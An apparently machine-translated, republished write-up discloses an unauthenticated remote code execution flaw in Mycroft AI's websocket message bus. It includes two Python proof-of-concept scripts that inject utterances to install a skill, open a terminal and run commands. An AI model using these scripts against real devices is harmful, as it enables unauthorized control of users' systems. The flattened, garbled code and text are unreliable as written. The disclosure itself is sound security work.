Shulou(Shulou.com)05/31 Report--

This article is about how to analyze the remote code execution vulnerabilities of Mycroft AI. The editor thinks it is very practical, so I share it with you to learn. I hope you can get something after reading this article.

When I contributed to the development of the open source software package in the Arch Linux community, I found a very interesting project-Mycroft Mycroft AI, which is an open source voice assistant application based on artificial intelligence (AI). In the process of studying it, I found a remote code execution vulnerability (RCE) that can be implemented without clicking on interaction.

Unlike the industry's famous Amazon Echo and Google Home, Mycroft first launched crowdfunding on overseas websites in 2015 to mass produce its Mark-I and Mark-II generation products, and in March its Mark-II generation products were sold out four days after its launch. Mycroft AI Intelligent Voice Assistant, based on Linux Desktop/Server and Raspberry PI architecture, is widely used in intelligent automated home systems, and its new application will be customized in some models of Jaguar and Land Rover.

Code analysis

In the analysis of the source code of Mycroft AI, I found one of the interesting things:

Host = config.get ("host") port = config.get ("port") route = config.get ("route") validate_param (host, "websocket.host") validate_param (port, "websocket.port") validate_param (route, "websocket.route") routes = [(route, WebsocketEventHandler)] application = web.Application (routes, * * settings) application.listen (port, host) ioloop.IOLoop.instance () start ()..

Here it defines a websocket server, which is used to receive instructions similar to the Andriod remote client, and gives a specific definition of the websocket server settings in mycroft.conf:

/ / The mycroft-core messagebus' websocket "websocket": {"host": "0.0.0.0", "port": 8181, "route": "/ core", "ssl": false}

From the above code, we can see that the default websocket server on 0.0.0.0:8181/core does not require any authentication. OK, let's write a script to test it:

#! / usr/bin/env pythonimport asyncioimport websocketsuri = "ws://myserver:8181/core" command = "say pwned" async def sendPayload (): async with websockets.connect (uri) as websocket: await websocket.send ("{\" data\ ": {\" utterances\ ": [\"+ command+"\ "]},\" type\ ":\" recognizer_loop:utterance\ " \ "context\": null} ") asyncio.get_event_loop () .run_until_complete (sendPayload ())

Well, we can get Mycroft AI to say "pwned" himself, so we can get Mycroft AI to speak remotely, but it's not a big discovery, it's just a scare to a friend at best.

Mycroft AI's skill system

After digging deeper, you can find that Mycroft has a built-in skills system on which you can install other voice skills you want, which sounds good, doesn't it?

So what are the elements of a skill in Mycroft? As you can see from the documentation given, the skill elements of Mycroft are as follows:

Dialog/en-us/command.dialog: contains voice commands that trigger skills

Vocab/en-us/answer.voc: contains the answer to Mycroft's voice.

Requirements.txt: contains the required installation packages for skills installed by pip

_ _ int__.py: contains the main function of the skill and the commands that need to be loaded to trigger execution

Utilization analysis

With the above skill elements, I can create a malicious skill that, when triggered, can execute arbitrary code on the remote Mycroft device. Unfortunately, this approach cannot be achieved through voice commands, unless the skill link URL is not singled out by some online sites. It's possible, but it's kind of troublesome.

Test implementation

With the above skill elements, I can create a malicious skill that, when triggered, can execute arbitrary code on the remote Mycroft device. Unfortunately, this approach cannot be achieved through voice commands, unless the skill link URL is an online site that has not been anonymized. This is possible, but it is somewhat troublesome to implement.

Mycroft comes with many default skills, such as open, which can open other third-party applications, and skills that are white-named but not installed on Mycroft devices. Through further research, I found an interesting skill called skill-autogui, whose main function is to control the mouse and keyboard. All right, let's try it! Combine all the above available findings into a single PoC:

#! / usr/bin/env pythonimport sysimport asyncioimport websocketsimport timecmds = ["mute audio"] + sys.argv [1:] uri = "ws://myserver:8181/core" async def sendPayload (): for payload in cmds: async with websockets.connect (uri) as websocket: await websocket.send ("{\" data\ ": {\" utterances\ ": [\" + payload+ "\"]},\ "type\":\ "recognizer_loop:utterance\" \ "context\": null} ") time.sleep (1) asyncio.get_event_loop () .run_until_complete (sendPayload ())

After running the exploit code with the pwn.py "install autogui"open xterm"type echo pwned"press enter" command, you can execute the command on the Linux system of a remote Mycroft device:

Notes:

Open xterm: since my test Linux is desktop, the remote test machine is also executed directly through the terminal TTY.

At present, there is a big change in the skills branch package of Mycroft. Some skills, including autogui, are temporarily unavailable, but this is not the point. Many of Mycroft's skills can be interacted with intelligent automated home systems, so it may be possible for other services to be controlled and utilized. The key to this vulnerability is that the websocket server lacks the necessary authentication.

Vulnerabilities affect Devic

All devices that are equipped with Mycroft and the websocket server is exposed to the network (the websocket interface of Mark-I generation applications is behind the firewall by default)

The above is how to analyze the remote code execution vulnerabilities of Mycroft AI. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.